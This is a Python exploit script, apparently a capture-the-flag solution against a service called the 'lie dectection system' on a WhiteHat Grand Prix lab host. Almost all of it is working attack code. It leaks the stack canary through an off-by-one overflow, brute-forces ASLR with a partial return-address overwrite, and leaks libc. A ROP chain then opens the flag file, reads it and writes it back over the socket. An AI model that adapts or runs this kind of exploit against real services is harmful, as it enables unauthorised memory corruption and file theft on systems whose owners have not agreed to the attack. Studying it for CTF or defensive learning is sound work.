#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
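def exploit():
    """Brute-force the target's ASLR nibble, leak libc, then dump the flag over the socket.

    One fresh connection per loop iteration:
      1. Overflow the name field by one byte past the stack canary's NUL so the
         service's echo leaks the remaining 7 canary bytes.
      2. Overwrite only the low 16 bits of the saved return address with the
         bytes 22 4d (the author's "brute force this"). One nibble of that range
         is presumably ASLR-randomized, so a wrong guess kills the process and the
         loop simply reconnects and tries again.
      3. On a hit the service evidently re-enters main (banner printed again); a
         second overflow then leaks a libc pointer from the echo, fixing libc_base.
      4. Send a ROP chain: read(0, buf, n) the flag path into a writable libc
         address, open() it, read() its contents, write() them back on fd 0.

    Returns nothing; canary/libc_base go to stdout and the session is handed to
    p.io() so the flag bytes written by the chain can be read interactively.

    Review caveats:
      * Every libc offset below is tied to the target's specific libc build and
        must be recomputed for any other build.
      * The chain assumes open() returns fd 3 (fds 0-2 taken, nothing else open).
      * Writing the flag to fd 0 relies on stdin being the bidirectional socket
        (xinetd/socat-style service).
      * time.sleep(1) is timing-based: it gives the chain's read(0, ...) time to
        start before the path is sent, so the two sends are not merged into one
        read by the service.
      * The fixed slice offsets (22, 265, 358) depend on the service's exact echo
        format and on what the Pwn helpers return -- TODO confirm if a leak looks
        wrong by a few bytes.
      * Socket errors from a dead target are not caught; if Pwn raises on a reset
        connection the brute force aborts instead of retrying.
    """
    flag_path = '/home/ctf/flag.txt'
    while True:
        # Fresh connection per guess: a wrong return-address guess kills the
        # target process, so nothing from a failed attempt is reusable.
        p = Pwn(mode=1, host='lab10.grandprix.whitehatvn.com', port=1337)
        # For a local copy of the binary use Pwn(mode=1) instead.
        p.connect()
        p.read_until('Welcome to the lie dectection system!')
        p.read_until('Your name:')
        # 264 bytes fill the buffer; the 265th clobbers the canary's low NUL byte
        # so the echo prints the 7 non-zero canary bytes right after the A's.
        p.write('A'*265)
        data = p.read_until('Your age:')
        data = data[22:]  # skip the echo prefix; offset is service-specific
        canary = '\x00' + data[265:265 + 7]
        print('Canary %s' % hex(p.unpack(canary)))
        # buffer | canary | saved rbp | low 2 bytes of the return address.
        # Only 16 bits are overwritten; the page-aligned low 12 bits are stable,
        # the remaining nibble is what the loop brute-forces (author: "brute force this").
        p.send('A'*264 + canary + 'A'*8 + '\x22\x4d')
        # The first chunk is intentionally discarded; the hit/miss decision is
        # made on the second one only.
        d = p.recv(1024)
        d = p.recv(1024)
        if 'Welcome to the lie dectection system!' not in d:
            # Wrong guess (process gone or never re-entered main): retry.
            print('Thot')
            continue
        if 'Your name:' not in d:
            p.read_until('Your name:')
        # Second overflow: the echo now carries a libc pointer at a fixed offset.
        p.send('C'*336)
        data = p.read_until('Your age:')
        # 6-byte little-endian pointer zero-extended to 8; the subtrahend is the
        # leaked symbol's offset in the target's libc build (hard-coded).
        libc_base = p.unpack(data[358:358 + 6] + '\x00'*2) - 0x21ec5
        open_addr = libc_base + 0xeb610
        write_addr = libc_base + 0xeb860
        read_addr = libc_base + 0xeb800
        # Writable scratch area inside libc's data segment (author's name;
        # presumably near main_arena -- not verified here).
        main_area = libc_base + 3925968
        pop_rdx_pop_rsi = libc_base + 0x108169  # pop rdx; pop rsi; ret
        pop_rdi = libc_base + 0x22b1a           # pop rdi; ret
        print('Libc_base %s' % hex(libc_base))
        print('open() %s' % hex(open_addr))
        print('read_addr() %s' % hex(read_addr))
        print('write() %s' % hex(write_addr))
        # Send the path WITH its NUL terminator: open() needs a C string, and the
        # original chain silently relied on the byte following the path in
        # main_area already being zero.
        path_buf = flag_path + '\x00'
        chain = [
            pop_rdi, 0,
            pop_rdx_pop_rsi, len(path_buf), main_area,
            read_addr,                      # read(0, main_area, len(path_buf))
            pop_rdi, main_area,
            pop_rdx_pop_rsi, 0x400, 0,
            open_addr,                      # open(main_area, O_RDONLY); mode (rdx) only matters with O_CREAT
            pop_rdi, 3,
            pop_rdx_pop_rsi, 4096, main_area + 0x200,
            read_addr,                      # read(3, main_area + 0x200, 4096) -- assumes open() gave fd 3
            pop_rdi, 0,
            pop_rdx_pop_rsi, 4096, main_area + 0x200,
            write_addr,                     # write(0, main_area + 0x200, 4096)
        ]
        pl = 'A'*264 + canary + 'A'*8 + p.pA(chain)
        p.send(pl)
        # Let the chain reach its read(0, ...) before the path arrives so the
        # two sends are not coalesced into the age read (timing-based).
        time.sleep(1)
        p.send(path_buf)
        p.io()
        break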
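# Entry-point guard so the exploit only fires when run as a script, not on import.
if __name__ == '__main__':
    exploit()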